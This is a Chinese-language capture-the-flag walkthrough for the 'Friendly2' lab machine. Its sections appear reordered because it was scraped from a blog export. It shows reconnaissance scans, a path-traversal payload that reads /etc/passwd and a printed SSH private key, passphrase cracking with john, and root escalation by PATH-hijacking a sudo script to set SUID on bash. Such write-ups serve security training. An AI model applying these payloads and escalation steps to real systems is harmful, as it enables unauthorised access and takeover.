KEY-----\nb3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABC7peoQE4\nzNYwvrv72HTs4TAAAAEAAAAAEAAAGXAAAAB3NzaC1yc2EAAAADAQABAAABgQC2i1yzi3G5\nQPSlTgc\/EdnvrisIm0Z0jq4HDQJDRMaXQ4i4UdIlbEgmO\/FA17kHzY1Mzi5vJFcLUSVVcF\n1IAny5Dh8VA4t\/+LRH0EFx6ZFibYinUJacgteD0RxRAUqNOjiYayzG1hWdKsffGzKz8EjQ\n9xcBXAR9PBs6Wkhur+UptHi08QmtCWLV8XAo0DW9ATlkhSj25KiicNm+nmbEbLaK1U7U\/C\naXDHZCcdIdkZ1InLj246sovn5kFPaBBHbmez9ji11YNaHVHgEkb37bLJm95l3fkU6sRGnz\n6JlqXYnRLN84KAFssQOdFCFKqAHUPC4eg2i95KVMEW21W3Cen8UFDhGe8sl++VIUy\/nqZn\n8ev8deeEk3RXDRb6nwB3G+96BBgVKd7HCBediqzXE5mZ64f8wbimy2DmM8rfBMGQBqjocn\nxkIS7msERVerz4XfXURZDLbgBgwlcWo+f8z2RWBawVgdajm3fL8RgT7At\/KUuD7blQDOsk\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ chmod 600 id_rsa\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ ssh gh0st@172.20.10.4 -i id_rsa \nEnter passphrase for key 'id_rsa':<\/code><\/pre>\n\u770b\u6765\u662f\u79c1\u94a5\u8fd8\u6709\u5bc6\u7801\u4e86\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u7206\u7834\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ ssh2john id_rsa > hash.txt \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ john hash.txt -w=\/usr\/share\/wordlists\/rockyou.txt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (SSH, SSH private key [RSA\/DSA\/EC\/OPENSSH 32\/64])\nCost 1 (KDF\/cipher [0=MD5\/AES 1=MD5\/3DES 2=Bcrypt\/AES]) is 2 for all loaded hashes\nCost 2 (iteration count) is 16 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nceltic (id_rsa) \n1g 0:00:00:15 DONE (2024-04-14 04:53) 0.06640g\/s 16.99p\/s 16.99c\/s 16.99C\/s 888888..freedom\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n\u5c1d\u8bd5\u767b\u5f55\uff01<\/p>\n
<\/div><\/p>\n\u62ff\u4e0b\uff01<\/p>\n
\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\ngh0st@friendly2:~$ pwd\n\/home\/gh0st\ngh0st@friendly2:~$ ls -la\ntotal 32\ndrwxr-xr-x 4 gh0st gh0st 4096 Apr 29 2023 .\ndrwxr-xr-x 3 root root 4096 Apr 27 2023 ..\nlrwxrwxrwx 1 root root 9 Apr 29 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 gh0st gh0st 220 Mar 27 2022 .bash_logout\n-rw-r--r-- 1 gh0st gh0st 3526 Mar 27 2022 .bashrc\ndrwxr-xr-x 3 gh0st gh0st 4096 Apr 29 2023 .local\n-rw-r--r-- 1 gh0st gh0st 807 Mar 27 2022 .profile\ndrwx--x--x 2 gh0st gh0st 4096 Apr 29 2023 .ssh\n-r--r----- 1 gh0st root 33 Apr 27 2023 user.txt\ngh0st@friendly2:~$ cat user.txt \nab0366431e2d8ff563cf34272e3d14bd\ngh0st@friendly2:~$ sudo -l\nMatching Defaults entries for gh0st on friendly2:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser gh0st may run the following commands on friendly2:\n (ALL : ALL) SETENV: NOPASSWD: \/opt\/security.sh\ngh0st@friendly2:~$ cat \/opt\/security.sh\n#!\/bin\/bash\n\necho "Enter the string to encode:"\nread string\n\n# Validate that the string is no longer than 20 characters\nif [[ ${#string} -gt 20 ]]; then\n echo "The string cannot be longer than 20 characters."\n exit 1\nfi\n\n# Validate that the string does not contain special characters\nif echo "$string" | grep -q '[^[:alnum:] ]'; then\n echo "The string cannot contain special characters."\n exit 1\nfi\n\nsus1='A-Za-z'\nsus2='N-ZA-Mn-za-m'\n\nencoded_string=$(echo "$string" | tr $sus1 $sus2)\n\necho "Original string: $string"\necho "Encoded string: $encoded_string"<\/code><\/pre>\n\u6dfb\u52a0\u73af\u5883\u53d8\u91cf<\/h3>\ngh0st@friendly2:\/tmp$ echo 'chmod +s \/bin\/bash' > grep\ngh0st@friendly2:\/tmp$ chmod +x grep\ngh0st@friendly2:\/tmp$ whereis grep\ngrep: \/usr\/bin\/grep \/tmp\/grep \/usr\/share\/man\/man1\/grep.1.gz \/usr\/share\/info\/grep.info.gz\ngh0st@friendly2:\/tmp$ sudo \/opt\/security.sh\nEnter the string to encode:\nasdasdasdasd\nOriginal string: asdasdasdasd\nEncoded string: nfqnfqnfqnfq\ngh0st@friendly2:\/tmp$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Mar 27 2022 \/bin\/bash\ngh0st@friendly2:\/tmp$ sudo PATH=$PWD:$PATH \/opt\/security.sh\nEnter the string to encode:\n213123123\nThe string cannot contain special characters.\ngh0st@friendly2:\/tmp$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1234376 Mar 27 2022 \/bin\/bash\ngh0st@friendly2:\/tmp$ bash -p\nbash-5.1# cd \/root\nbash-5.1# ls -la\ntotal 28\ndrwx------ 3 root root 4096 Apr 29 2023 .\ndrwxr-xr-x 19 root root 4096 Apr 27 2023 ..\nlrwxrwxrwx 1 root root 9 Apr 27 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc\n-r-xr-xr-x 1 root root 509 Apr 27 2023 interfaces.sh\ndrwxr-xr-x 3 root root 4096 Apr 8 2023 .local\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-r-------- 1 root root 43 Apr 29 2023 root.txt\nbash-5.1# cat root.txt \nNot yet! Try to find root.txt.\n\nHint: ...\nbash-5.1# find \/ -name root.txt -type f 2>\/dev\/null\n\/root\/root.txt\nbash-5.1# find \/ -name "..." 2>\/dev\/null\n\/...\nbash-5.1# cd \/...\nbash-5.1# ls -la\ntotal 12\nd-wx------ 2 root root 4096 Apr 29 2023 .\ndrwxr-xr-x 19 root root 4096 Apr 27 2023 ..\n-r-------- 1 root root 100 Apr 29 2023 ebbg.txt\nbash-5.1# cat ebbg.txt \nIt's codified, look the cipher:\n\n98199n723q0s44s6rs39r33685q8pnoq\n\nHint: numbers are not codified<\/code><\/pre>\n\u5c1d\u8bd5\u4fee\u6539\u4e00\u4e0b\u811a\u672c\uff0c\u8ba9\u811a\u672c\u8fdb\u884c\u89e3\u5bc6\uff1a<\/p>\n
#!\/bin\/bash\n\necho "Enter the string to encode:"\nread string\n\n# Validate that the string is no longer than 20 characters\nif [[ ${#string} -gt 50 ]]; then\n echo "The string cannot be longer than 50 characters."\n exit 1\nfi\n\n# Validate that the string does not contain special characters\nif echo "$string" | grep -q '[^[:alnum:] ]'; then\n echo "The string cannot contain special characters."\n exit 1\nfi\n\nsus1='A-Za-z'\nsus2='N-ZA-Mn-za-m'\n\nencoded_string=$(echo "$string" | tr $sus1 $sus2)\n\necho "Original string: $string"\necho "Encoded string: $encoded_string"<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ .\/decrypt.py \nzsh: permission denied: .\/decrypt.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ chmod +x decrypt.py \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ .\/decrypt.py\nEnter the string to encode:\n98199n723q0s44s6rs39r33685q8pnoq\nOriginal string: 98199n723q0s44s6rs39r33685q8pnoq\nEncoded string: 98199a723d0f44f6ef39e33685d8cabd<\/code><\/pre>\n\u5f97\u5230flag\uff01\uff01\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
Friendly2 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 172.20.10.4 — -A Open […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-554","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/554","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=554"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/554\/revisions"}],"predecessor-version":[{"id":555,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/554\/revisions\/555"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=554"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=554"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=554"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
rustscan -a 172.20.10.4 -- -A<\/code><\/pre>\nOpen 172.20.10.4:22\nOpen 172.20.10.4:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n| 3072 74:fd:f1:a7:47:5b:ad:8e:8a:31:02:fe:44:28:9f:d2 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzieRbxwfRD6zuOrOmgPocWFr6Ufu9oCqOlt\/Da5dqgRIZwctsaB6P5+6aDoCtBvFAzQXZQSMmT4GmIWR7eZ\/Obou3fBSMU4X8R+C\/VLyx1wifxNHy5LZ0+6djQX5cl5qhBseWQX3XIqPt+4DzRILCiMZSm9J8dnC0KEe14a8vkSfgV7Zn7xGOaw9R+KldazraLdT3zlzVuvjZjItIBjnA9tBorwY2u\/RgMX++HXD3uySm1qt8w+pFGI7WFd\/ktfwp3RhcdKMEYmqWhjAO3L9A9arf2vDYL9y\/t53XIs+FAOXzoBc2A5gxxVBe7sMsuQCSF0Jw0z5Qf11Zj9si\/\/6WG2KfihR7rKLEIfgeGFGvnilw88HT6sZQGTew1VpfRFLgMZTPpAOwzxlqUYIRWEEvmPrW7DGqzuY+8NpJQpiOhdjhuiS0\/SW6PfHVB\/nsNs1pWWwo\/q+HxyAAS3WjCrkd1xMf92KMs1yheQHKUGNxV\/zVuTbt9puXnVhIZGzzhsE=\n| 256 16:f0:de:51:09:ff:fc:08:a2:9a:69:a0:ad:42:a0:48 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFE+bBFz\/3QsD9M4Nt6is2iJpFKhlUCSEqpUtATmeiN6jNBE245wbyIk7h3JqOxldcKyfhn7uysTo8NG4AqhPEA=\n| 256 65:0e:ed:44:e2:3e:f0:e7:60:0c:75:93:63:95:20:56 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKxSz6doeuMiydUVbE7ZwrdP8GW46iJYY3JxJPcNuvnA\n80\/tcp open http syn-ack Apache httpd 2.4.56 ((Debian))\n| http-methods: \n|_ Supported Methods: GET POST OPTIONS HEAD\n|_http-title: Servicio de Mantenimiento de Ordenadores\n|_http-server-header: Apache\/2.4.56 (Debian)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\ngobuster dir -u http:\/\/172.20.10.4 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n\/.php (Status: 403) [Size: 276]\n\/tools (Status: 301) [Size: 310] [--> http:\/\/172.20.10.4\/tools\/]\n\/assets (Status: 301) [Size: 311] [--> http:\/\/172.20.10.4\/assets\/]\n\/.php (Status: 403) [Size: 276]\n\/server-status (Status: 403) [Size: 276]<\/code><\/pre>\n\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h http:\/\/172.20.10.4<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 172.20.10.4\n+ Target Hostname: 172.20.10.4\n+ Target Port: 80\n+ Start Time: 2024-04-14 04:28:46 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.56 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/: Server may leak inodes via ETags, header found with file \/, inode: a8a, size: 5fa570aaa96df, mtime: gzip. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2003-1418\n+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .\n+ \/tools\/: This might be interesting.\n+ 8102 requests: 0 error(s) and 5 item(s) reported on remote host\n+ End Time: 2024-04-14 04:29:02 (GMT-4) (16 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div>
\n<\/div>
\n<\/div>
\n<\/div><\/p>\n\u654f\u611f\u76ee\u5f55<\/h3>\nhttp:\/\/172.20.10.4\/tools\/<\/code><\/pre>\n<\/div><\/p>\n\u8fd9\u662f\u897f\u73ed\u7259\u8bed\uff0c\u7ffb\u8bd1\u4e3a\u4e2d\u6587\u7684\u8bdd\u662f\uff1a<\/p>\n
\n\u6b64\u9875\u9762\u4e0a\u7684\u6240\u6709\u4fe1\u606f\u90fd\u4ee5\u4fdd\u5bc6\u7ea7\u522b\u7f16\u76ee4\uff0c\u6b64\u4fe1\u606f\u4e0d\u5e94\u53d1\u9001\u6216\u5171\u4eab\u7ed9\u516c\u53f8\u7684\u4efb\u4f55\u5916\u90e8\u4ee3\u7406\u3002
\n\u8981\u505a\u7684\u4e8b\u60c5\uff1a
\n\u5c06\u56fe\u7247\u6dfb\u52a0\u5230\u4e3b\u7f51\u7ad9\u3002
\n\u6dfb\u52a0\u9ed1\u8272\u4e3b\u9898\u3002
\n\u628a\u8fd9\u9875\u7ffb\u8bd1\u6210\u82f1\u8bed\u3002<\/p>\n<\/blockquote>\n
\u67e5\u770b\u6e90\u4ee3\u7801\u53d1\u73b0\uff1a<\/p>\n
<!-- Redimensionar la imagen en check_if_exist.php?doc=keyboard.html --><\/code><\/pre>\n\u8bbf\u95ee\u4e00\u4e0b\uff1a<\/p>\n
http:\/\/172.20.10.4\/tools\/check_if_exist.php?doc=keyboard.html<\/code><\/pre>\n<\/div><\/p>\n\n\u8fd9\u6b3e\u673a\u68b0\u952e\u76d8\u914d\u5907\u4e86Cherry MX\u5f00\u5173\u548cRGB\u80cc\u5149\uff0c\u63d0\u4f9b\u975e\u51e1\u7684\u4e66\u5199\u4f53\u9a8c\u3002\u5176\u7d27\u51d1\u7684\u8bbe\u8ba1\u548c\u575a\u56fa\u7684\u7ed3\u6784\u4f7f\u5176\u6210\u4e3a\u4efb\u4f55\u5de5\u4f5c\u7ad9\u7684\u5b8c\u7f8e\u8865\u5145\u3002<\/p>\n
Cherry MX\u4ea4\u6362\u673a\u3002
\nRGB\u80cc\u5149\u3002
\n\u7d27\u51d1\u578b\u8bbe\u8ba1\u3002
\n\u5b9e\u5fc3\u7ed3\u6784\u3002
\nUSB\u8fde\u63a5<\/p>\n<\/blockquote>\n
\u67e5\u770b\u6e90\u4ee3\u7801\uff0c\u6ca1\u4e1c\u897f\uff0c\u5c1d\u8bd5LFI\uff01<\/p>\n
http:\/\/172.20.10.4\/tools\/check_if_exist.php?doc=..\/..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-timesync:x:999:999:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nsystemd-coredump:x:998:998:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nmessagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:104:65534::\/run\/sshd:\/usr\/sbin\/nologin\ngh0st:x:1001:1001::\/home\/gh0st:\/bin\/bash<\/code><\/pre>\nhttp:\/\/172.20.10.4\/tools\/check_if_exist.php?doc=..\/..\/..\/..\/..\/home\/gh0st\/.ssh\/id_rsa<\/code><\/pre>\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABC7peoQE4\nzNYwvrv72HTs4TAAAAEAAAAAEAAAGXAAAAB3NzaC1yc2EAAAADAQABAAABgQC2i1yzi3G5\nQPSlTgc\/EdnvrisIm0Z0jq4HDQJDRMaXQ4i4UdIlbEgmO\/FA17kHzY1Mzi5vJFcLUSVVcF\n1IAny5Dh8VA4t\/+LRH0EFx6ZFibYinUJacgteD0RxRAUqNOjiYayzG1hWdKsffGzKz8EjQ\n9xcBXAR9PBs6Wkhur+UptHi08QmtCWLV8XAo0DW9ATlkhSj25KiicNm+nmbEbLaK1U7U\/C\naXDHZCcdIdkZ1InLj246sovn5kFPaBBHbmez9ji11YNaHVHgEkb37bLJm95l3fkU6sRGnz\n6JlqXYnRLN84KAFssQOdFCFKqAHUPC4eg2i95KVMEW21W3Cen8UFDhGe8sl++VIUy\/nqZn\n8ev8deeEk3RXDRb6nwB3G+96BBgVKd7HCBediqzXE5mZ64f8wbimy2DmM8rfBMGQBqjocn\nxkIS7msERVerz4XfXURZDLbgBgwlcWo+f8z2RWBawVgdajm3fL8RgT7At\/KUuD7blQDOsk\nWZR8KsegciUa8AAAWQNI9mwsIPu\/OgEFaWLkQ+z0oA26f8k\/0hXZWPN9THrVFZRwGOtD8u\nutUgpP9SyHrL02jCx\/TGdypihPdUeI5ffCvXI98cnvQDzK95DSiBNkmIHu3V8+f0e\/QySN\nFU3pVI3JjB6CgSKX2SdiN+epUdtZwbynrJeEh5mh0ULqQeY1WeczfLKNRFemE6NPFc+bo7\nduQpt1I8DHPkh1UU2okfh8UoOMbkfOSLrVvB0dAaikk1RmtQs3x5CH6NhjsHOi7xDdza2A\ndWJPZ4WbvcaEIi\/vlDcjeOL285TIDqaom19O4XSrDZD70W61jM3whsicLDrupWxBUgTPqv\nFbr3D3OrQUfLMA1c\/Fbb1vqTQFcbsbApMDKm2Z4LigZad7dOYyPVToEliyzksIk7f0x3Zr\ns+o1q2FpE4iR3hQtRH2IGeGo3IZtGV6DnWgwe\/FTQWT57TNPMoUNkrW5lmo69Z2jjBBZa4\nq\/eO848T2FlGEt7fWVsuzveSsln5V+mT6QYIpWgjJcvkNzQ0lsBUEs0bzrhP1CcPZ\/dezw\noBGFvb5cnrh0RfjCa9PYoNR+d\/IuO9N+SAHhZ7k+dv4He2dAJ3SxK4V9kIgAsRLMGLZOr1\n+tFwphZ2mre\/Z\/SoT4SGNl8jmOXb6CncRLoiLgYVcGbEMJzdEY8yhBPyvX1+FCVHIHjGCU\nVCnYqZAqxkXhN0Yoc0OU+jU6vNp239HbtaKO2uEaJjE4CDbQbf8cxstd4Qy5\/MBaqrTqn6\nUWWiM+89q9O80pkOYdoeHcWLx0ORHFPxB1vb\/QUVSeWnQH9OCfE5QL51LaheoMO9n8Q5dy\nbSJnR8bjnnZiyQ0AVtFaCnHe56C4Y8sAFOtyMi9o2GKxaXObUsZt30e4etr1Fg2JNY6+Ma\nbS8K6oUcIuy+pObFzlgjXIMdiGkix\/uwT+tC2+HHyAett2bbgwuTrB3cA8bkuNpH\/sBfgf\nf5rFGDu6RpFEVyiF0R6on6dZRBTCXIymfdpj6wBo0\/uj0YpqyqFTcJpnb2fntPcVoISM7s\n5kGVU\/19fN39rtAIUa9XWk5PyI2avOYMnyeJwn3vaQ0dbbnaqckLYzLM8vyoygKFxWS3BC\n6w0TBZDqQz36sD0t0bfIeSuZamttSFP1\/pufLYtF+zaIUOsKzwwpYgUsr6iiRFKVTTv7w2\ncqM2VCavToGkI86xD9bKLU+xNnuSNbq+mtOZUodAKuON8SdW00BFOSR\/8EN7dZTKGipura\no8lsrT0XW+yZh+mlSVtuILfO5fdGKwygBrj6am1JQjOHEnmKkcIljMJwVUZE\/s4zusuH09\nKx2xMUx4WMkLSUydSvflAVA7ZH9u8hhvrgBL\/Gh5hmLZ7uckdK0smXtdtWt+sfBocVQKbk\neUs+bnjkWniqZ+ZLVKdjaAN8bIZVNqUhX6xnCauoVXDkeKl2tP7QuhqDbOLd7hoOuhLD4s\n9LVqxvFtDuRWjtwFhc25H8HsQtjKCRT7Oyzdoc98FBbbJCWdyu+gabq17\/sxR6Wfhu+Qj3\nnY2JGa230fMlBvSfjiygvXTTAr98ZqyioEUsRvWe7MZssqZDRWj8c61LWsGfDwJz\/qOoWJ\nHXTqScCV9+B+VJfoVGKZ\/bOTJ1NbMlk6+fCU1m4fA\/67NM2Y7cqXv8HXdnlWrZzTwWbqew\nRwDz5GzPiB9aiSw8gDSkgPUmbWztiSWiXlCv25p0yblMYtIYcTBLWkpK8DRkR0iShxjfLC\nTDR1WHXRNjmli\/ZlsH0Unfs0Vk\/dNpYfJoePkvKYpLEi3UFfucsQH1KyqLKQbbka82i+v\/\npD1DmNcHFVagbI9hQkYGOHON66UX0l\/LIw0inIW7CRc8z0lpkShXFBgLPeg+mvzBGOEyq6\n9tDhjVw3oagRmc3R03zfIwbPINo=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
\u79c1\u94a5ssh\u8fde\u63a5<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ vim id_rsa \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ chmod 600 id_rsa \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ ssh gh0st@172.20.10.4 -i id_rsa \n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\nIT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!\nSomeone could be eavesdropping on you right now (man-in-the-middle attack)!\nIt is also possible that a host key has just been changed.\nThe fingerprint for the ED25519 key sent by the remote host is\nSHA256:YDW5zhbCol\/1L6a3swXHsFDV6D3tUVbC09Ch+bxLR08.\nPlease contact your system administrator.\nAdd correct host key in \/home\/kali\/.ssh\/known_hosts to get rid of this message.\nOffending ECDSA key in \/home\/kali\/.ssh\/known_hosts:18\n remove with:\n ssh-keygen -f '\/home\/kali\/.ssh\/known_hosts' -R '172.20.10.4'\nHost key for 172.20.10.4 has changed and you have requested strict checking.\nHost key verification failed.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ ssh-keygen -f '\/home\/kali\/.ssh\/known_hosts' -R '172.20.10.4'\n# Host 172.20.10.4 found: line 17\n# Host 172.20.10.4 found: line 18\n\/home\/kali\/.ssh\/known_hosts updated.\nOriginal contents retained as \/home\/kali\/.ssh\/known_hosts.old\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ ssh gh0st@172.20.10.4 -i id_rsa \nThe authenticity of host '172.20.10.4 (172.20.10.4)' can't be established.\nED25519 key fingerprint is SHA256:YDW5zhbCol\/1L6a3swXHsFDV6D3tUVbC09Ch+bxLR08.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '172.20.10.4' (ED25519) to the list of known hosts.\nLoad key "id_rsa": error in libcrypto\n(gh0st@172.20.10.4) Password:\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ ssh gh0st@172.20.10.4 -i id_rsa -vvv\nOpenSSH_9.6p1 Debian-3, OpenSSL 3.1.4 24 Oct 2023\ndebug1: Reading configuration data \/etc\/ssh\/ssh_config\ndebug1: \/etc\/ssh\/ssh_config line 19: include \/etc\/ssh\/ssh_config.d\/*.conf matched no files\ndebug1: \/etc\/ssh\/ssh_config line 21: Applying options for *\ndebug2: resolve_canonicalize: hostname 172.20.10.4 is address\ndebug3: expanded UserKnownHostsFile '~\/.ssh\/known_hosts' -> '\/home\/kali\/.ssh\/known_hosts'\ndebug3: expanded UserKnownHostsFile '~\/.ssh\/known_hosts2' -> '\/home\/kali\/.ssh\/known_hosts2'\ndebug3: channel_clear_timeouts: clearing\ndebug3: ssh_connect_direct: entering\ndebug1: Connecting to 172.20.10.4 [172.20.10.4] port 22.\ndebug3: set_sock_tos: set socket 3 IP_TOS 0x10\ndebug1: Connection established.\ndebug1: identity file id_rsa type -1\ndebug1: identity file id_rsa-cert type -1\ndebug1: Local version string SSH-2.0-OpenSSH_9.6p1 Debian-3\ndebug1: Remote protocol version 2.0, remote software version OpenSSH_8.4p1 Debian-5+deb11u1\ndebug1: compat_banner: match: OpenSSH_8.4p1 Debian-5+deb11u1 pat OpenSSH* compat 0x04000000\ndebug2: fd 3 setting O_NONBLOCK\ndebug1: Authenticating to 172.20.10.4:22 as 'gh0st'\ndebug3: record_hostkey: found key type ED25519 in file \/home\/kali\/.ssh\/known_hosts:22\ndebug3: load_hostkeys_file: loaded 1 keys from 172.20.10.4\ndebug1: load_hostkeys: fopen \/home\/kali\/.ssh\/known_hosts2: No such file or directory\ndebug1: load_hostkeys: fopen \/etc\/ssh\/ssh_known_hosts: No such file or directory\ndebug1: load_hostkeys: fopen \/etc\/ssh\/ssh_known_hosts2: No such file or directory\ndebug3: order_hostkeyalgs: have matching best-preference key type ssh-ed25519-cert-v01@openssh.com, using HostkeyAlgorithms verbatim\ndebug3: send packet: type 20\ndebug1: SSH2_MSG_KEXINIT sent\ndebug3: receive packet: type 20\ndebug1: SSH2_MSG_KEXINIT received\ndebug2: local client KEXINIT proposal\ndebug2: KEX algorithms: sntrup761x25519-sha512@openssh.com,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com\ndebug2: host key algorithms: 